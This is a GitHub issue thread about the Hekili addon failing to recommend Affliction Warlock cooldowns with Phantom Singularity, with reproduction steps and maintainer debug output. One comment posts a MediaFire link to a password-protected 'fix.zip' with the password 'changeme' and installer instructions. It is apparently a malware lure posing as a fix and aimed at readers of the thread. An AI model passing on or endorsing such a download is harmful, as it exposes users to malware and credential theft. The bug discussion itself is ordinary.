### ISSUE TITLE
[REC] Affliction: Soul Rot, Malevolance, and Summon Darkglare not recommended when playing Phantom Singularity and Imp Shadowbolt

### ISSUE THREAD

**Issue by Noodleboy0** [Hekili/hekili#3549]
### Before You Begin

- [X] I confirm that I have downloaded the latest version of the addon.
- [X] I am not playing on a private server.
- [X] I checked for an [existing, open ticket](https://github.com/Hekili/hekili/labels/recommendation) for this issue and was not able to find one.
- [X] I edited the title of this issue (above) so that it describes the issue I am reporting.
- [X] I am reporting an issue with the default priority included with the specialization (imported or edited priorities are not supported).

### Describe the Issue

Affliction CD's are not recommended when playing the single target build with Phantom Singularity. Seems to recommend all CD's just fine while specced Vile Taint, and Drain Soul.

Also when playing Improved Shadowbolt, Shadow's Embrace has a max stack of 2, instead of 4 while playing Drain Soul.

### How to Reproduce

1. Enter game as Affliction Warlock
2. Spec Hellcaller Hero Tree
3. Spec Phantom Singularity, and Improved Shadowbolt
4. Put up dots and stack Shadow's Embrace to max (2)
5. See recommendations

### Snapshot (Link)

https://pastebin.com/XEpTAg6m

### Raidbots Sim Report (Link)

https://www.raidbots.com/simbot/report/xfuCoMEkmQtH1xQ2aeyiDy

### Additional Information

Sim behavior currently is Agony, Unstable Affliction, Wither, Shadow Bolt x2, Phantom Singularity, Malevolence, Soul Rot, Summon Darkglare, then Malefic Rapture Spam.

Oblivion is also not recommended at all, though this issue is very minor as to my knowledge no build currently plays it.

### Contact Information

Discord: spujetti

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mjayfinley** [comment]
Seeing the same thing on my end.

**Comment by smemgaking** [comment]
Came to see if this had been posted, running into the same situation

**Comment by Hekili** [comment]
The snapshot needs to be taken when Phantom Singularity should be recommended but isn't.

In this snapshot, it looks like Phantom Singularity was already used (perhaps without being recommended, but the addon can't recommend it while it's on cooldown).

```
        61.  phantom_singularity ( default - 18 )
        The action is not ready ( 42.91 ) before our maximum delay window ( 3.45 ) for this query.
```

```
target_debuffs:
      980 - agony                                    -  11 - 6.49  
    48181 - haunt                                    -   1 - 7.05  
   316099 - unstable_affliction                      -   1 - 12.24 
   205179 - phantom_singularity                      -   1 - 13.12 
   445474 - wither                                   -   2 - 3600.00
   453206 - shadow_embrace                           -   2 - 14.92 
   458219 - infirmity                                -   1 - 3600.00
```

**Comment by Hekili** [comment]
Never mind, I see the root cause.
